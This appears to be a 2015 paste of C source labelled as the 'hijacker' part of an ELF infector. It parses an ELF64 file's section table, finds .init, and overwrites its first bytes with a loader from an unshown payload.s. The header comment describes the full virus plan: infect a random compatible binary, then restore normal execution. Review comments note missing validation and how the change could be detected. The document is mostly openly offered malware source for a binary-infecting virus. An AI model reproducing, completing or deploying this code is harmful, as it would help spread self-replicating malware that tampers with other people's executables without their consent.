Madmouse

elf hijacker portion of the elf infector

Dec 31st, 2015
  1. ////////////////////////////////////////////////////////////////////////////////
  2. // THE SCOTCH-WARE LICENSE (Revision 0):
  3. // <aaronryool/gmail.com> wrote this file. As long as you retain this notice you
  4. // can do whatever you want with this stuff. If we meet some day, and you think
  5. // this stuff is worth it, you can buy me a shot of scotch in return
  6. ////////////////////////////////////////////////////////////////////////////////
  7. //
  8. // The idea is basically to hijack the .init section, use the 27 bytes of
  9. // __init for the first stage loader, which will set up the environment for stage
  10. //  two, which will save the state of the program entry, randomly search for a
  11. // binary to latch onto, infect a random compatible binary, and then clean up,
  12. // restore the entry state, jmp into a reimplementation of __init, and continue
  13. // normal program execution...
  14.  
  15.  
  16. #include <string.h>
  17. #include <malloc.h>
  18. #include <stdio.h>
  19. #include <elf.h>
  20.  
  21. typedef struct target {    // in-memory pieces of the ELF64 file being parsed
  22.     Elf64_Ehdr* eheader;    // ELF file header; main() mallocs a buffer and freads into it
  23.     Elf64_Shdr* sheader;    // section header table; main() advances this pointer while scanning
  24.     Elf64_Phdr* pheader;    // program header table; never assigned or read in the code shown
  25.     char* shstable;         // section-name string table bytes, as read from the file
  26. } target_t;
  27.  
  28.  
  29. // Defined in payload.s, which is not shown on this page. Declared here as a
      // pointer-typed object; main() takes its address and copies the 8 bytes
      // stored there into the target file.
  30. extern const void* loader;
  31.  
  32. int main(int argc, char** argv)
  33. {
          // Proof-of-concept patcher: parses the ELF64 section table of the fixed
          // test file ./yay, locates the section named .init, and overwrites 8
          // bytes at that section file offset. Returns 0 unconditionally; argc and
          // argv are unused. The stage-two append mentioned at the end is not
          // implemented here, only the seek to end-of-file is.
          //
          // NOTE(review): every offset, count and index used below (e_shoff,
          // e_shnum, e_shstrndx, sh_offset, sh_size, sh_name) comes from the file
          // and is used without validation, and no fopen/malloc/fread/fseek/fwrite
          // result is checked. The e_ident magic and class are not checked either,
          // so any input is interpreted as ELF64. A malformed file can therefore
          // drive out-of-bounds reads in this process.
          //
          // NOTE(review), defensive view: the only on-disk change made by this code
          // is an in-place overwrite inside .init; no header field or section size
          // is modified, so for a well-formed file the length and section table
          // stay the same. Content hashes or package verification of installed
          // binaries detect the change, and opening for update needs write
          // permission on the target file.
  34.     target_t target;
  35.  
  36.     // open the hard-coded test binary in the current directory
          // NOTE(review): rw+ is not one of the mode strings defined by the C
          // standard; how it is interpreted is up to the C library. The result is
          // used below without a NULL check.
  37.     FILE* file = fopen("./yay", "rw+");
  38.  
  39.     // read in its ELF header (heap copy; nothing in main is ever freed)
  40.     target.eheader = malloc(sizeof(Elf64_Ehdr));
  41.     fread(target.eheader, sizeof(Elf64_Ehdr), 1, file);
  42.  
  43.     // seek to the section header table offset (e_shoff, taken from the file)
  44.     fseek(file, target.eheader->e_shoff, SEEK_SET);
  45.  
  46.     // read in the section header table: e_shnum entries of sizeof(Elf64_Shdr)
  47.     target.sheader = malloc(sizeof(Elf64_Shdr) * target.eheader->e_shnum);
  48.     fread(target.sheader, sizeof(Elf64_Shdr), target.eheader->e_shnum, file);
  49.  
  50.  
  51.     // point at the section header entry for the section-name string table;
          // e_shstrndx indexes the table just read and is not compared to e_shnum
  52.     Elf64_Shdr* stsh = target.sheader + target.eheader->e_shstrndx;
  53.  
  54.     // seek to the string table itself
  55.     fseek(file, stsh->sh_offset, SEEK_SET);
  56.  
  57.     // read in the section header strings table (sh_size bytes, as one item);
          // no terminator is appended, so the strcmp below trusts the file contents
  58.     target.shstable = malloc(stsh->sh_size);
  59.     fread(target.shstable, stsh->sh_size, 1, file);
  60.  
  61.     // search for the ".init" section; the scan advances target.sheader itself,
          // so after the loop it no longer points at the start of the allocation
  62.     for(int i = 0;i < target.eheader->e_shnum;i++, target.sheader++)
  63.     {
              // sh_name is an offset into the string table; not checked against its size
  64.         char* name = target.shstable + target.sheader->sh_name;
  65.         if(strcmp(name, ".init") == 0)
  66.         {
  67.             // print the section name, file offset and size, then overwrite the
                  // first 8 bytes of .init in place with the 8 bytes stored at the
                  // address of the loader object (contents depend on payload.s, not shown)
  68.             printf("%s: offset: %lx, size: %li\n", name, target.sheader->sh_offset, target.sheader->sh_size);
  69.             fseek(file, target.sheader->sh_offset, SEEK_SET);
  70.             fwrite(&loader, 1, 8, file);
  71.         }
  72.     }
  73.     // seek to end of file
  74.     fseek(file, 0, SEEK_END);
  75.  
  76.     // write the stage two object to the end of the file, and prepare it for its new host
          // (not implemented on this page: nothing is written after the seek above)
  77.  
          // the stream is never fclose()d; the buffered write is flushed by stdio at normal exit
  78.     return 0;
  79. }